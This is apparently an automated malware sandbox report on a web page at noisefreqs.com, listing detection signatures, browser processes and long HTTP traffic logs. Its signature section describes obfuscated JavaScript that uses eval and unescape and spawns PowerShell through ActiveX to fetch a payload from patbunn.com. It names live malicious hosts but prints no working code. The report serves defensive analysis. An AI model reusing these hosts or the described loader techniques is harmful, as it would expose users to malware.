Edit tour

Windows Analysis Report
https://noisefreqs.com/Ray-verify.html

Overview

General Information

Sample URL:https://noisefreqs.com/Ray-verify.html
Analysis ID:1565470
Infos:

Detection

Score:60
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
AI detected suspicious Javascript
HTML page contains string obfuscation

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • chrome.exe (PID: 2924 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 3168 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2360 --field-trial-handle=2260,i,4040764079350248205,16213322567652078909,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6628 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://noisefreqs.com/Ray-verify.html" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Suricata rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://noisefreqs.com/Ray-verify.htmlAvira URL Cloud: detection malicious, Label: malware
Source: https://noisefreqs.com/favicon.icoAvira URL Cloud: Label: malware

Phishing

barindex
Source: 0.9.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script shows multiple high-risk indicators: heavy obfuscation (variable names l1l, ll1, etc.), checks for browser/environment conditions likely for fingerprinting, protocol manipulation (zLP variable), and contains large blocks of commented whitespace to obscure code. Pattern matches known malicious code obfuscation techniques.
Source: 0.3.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Script contains multiple high-risk indicators: heavily obfuscated code using unescape/eval (3 points), aggressive DOM manipulation through insertAdjacentHTML (2 points), dynamic code execution via eval (3 points), and suspicious string manipulation patterns (1 point). The obfuscation appears intentional to hide malicious behavior.
Source: 0.12.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript: This script contains multiple high-risk indicators: 1) Uses eval() for dynamic code execution, 2) Heavy obfuscation through escape/unescape encoding, 3) Aggressive DOM manipulation through insertAdjacentHTML, and 4) Creates large strings of suspicious content. The code appears deliberately obscured to hide malicious intent.
Source: 0.11.i.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk code containing multiple severe security issues: 1) Uses eval() for dynamic code execution, 2) Contains heavily obfuscated/encoded strings using unescape(), 3) Uses string concatenation and global variables in suspicious ways, 4) Code is intentionally obscured with excessive whitespace and comments. Pattern matches known malicious code behaviors.
Source: 0.7.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: Highly malicious code detected: Uses ActiveX to spawn PowerShell, attempts to hide window (moveTo negative coordinates), downloads external payload from suspicious domain (patbunn.com), uses heavy obfuscation with string concatenation and character replacement, and executes downloaded content. Classic malware behavior with multiple high-risk indicators including dynamic code execution, obfuscation, and suspicious domain interaction.
Source: 0.5.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk script with multiple red flags: heavy obfuscation (variable names like 'III1', 'l111'), DOM manipulation to hide/remove elements, disabling of critical window functions (window.open, document.write, alert), injection of hidden content, and browser fingerprinting. Uses String.fromCharCode for obfuscation and creates large amounts of whitespace, typical of malicious scripts attempting to evade detection.
Source: 0.2.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript: High-risk code containing multiple red flags: heavily obfuscated strings, use of eval() with unescape() for dynamic code execution, and suspicious variable naming patterns typical of malware. The presence of encoded URI components and seemingly random variable names suggests deliberate obfuscation to hide malicious intent.
Source: https://noisefreqs.com/Ray-verify.htmlHTTP Parser: Found new string: script /*....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................*/var ppconf=0;var qy7='';...
Source: https://noisefreqs.com/Ray-verify.htmlHTTP Parser: No favicon
Source: https://noisefreqs.com/Ray-verify.htmlHTTP Parser: No favicon
Source: http://www.protware.com/HTTP Parser: No favicon
Source: http://www.protware.com/HTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknownHTTPS traffic detected: 23.218.208.109:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknownHTTPS traffic detected: 52.149.20.212:443 -> 192.168.2.4:49746 version: TLS 1.2
Source: unknownHTTPS traffic detected: 20.109.210.53:443 -> 192.168.2.4:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49766 version: TLS 1.2
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 23.218.208.109
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 52.149.20.212
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: unknownTCP traffic detected without corresponding DNS query: 13.107.246.63
Source: global trafficHTTP traffic detected: GET /Ray-verify.html HTTP/1.1Host: noisefreqs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: noisefreqs.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://noisefreqs.com/Ray-verify.htmlAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XutZmyL2PtaZank&MD=3+svr3o1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=XutZmyL2PtaZank&MD=3+svr3o1 HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /rules/other-Win32-v19.bundle HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224902v2s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120608v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120402v21s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120609v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120600v4s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120612v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120610v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120611v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120614v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120613v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120615v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120617v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120616v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120618v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120619v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120620v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120623v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120621v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120624v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120622v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120625v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120626v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120627v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120628v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120629v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120631v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120633v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120630v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120634v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120632v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120635v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120636v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120637v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120639v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120638v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120640v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120641v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120642v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120644v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120643v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120646v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120645v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120647v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120648v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120649v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120650v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120652v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120651v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120654v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120653v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120657v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120656v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120655v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120658v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120659v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: www.protware.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mm.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.protware.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /menu.htm HTTP/1.1Host: www.protware.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.protware.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /blank.htm HTTP/1.1Host: www.protware.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.protware.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /home.htm HTTP/1.1Host: www.protware.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http://www.protware.com/Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /mm.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /styleIE.css HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /frm.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /stat.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /style_M.css HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/css,*/*;q=0.1Referer: http://www.protware.com/menu.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /scroll.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.protware.com/home.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tpmnu.js HTTP/1.1Host: www.protware.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Referer: http://www.protware.com/menu.htmAccept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9
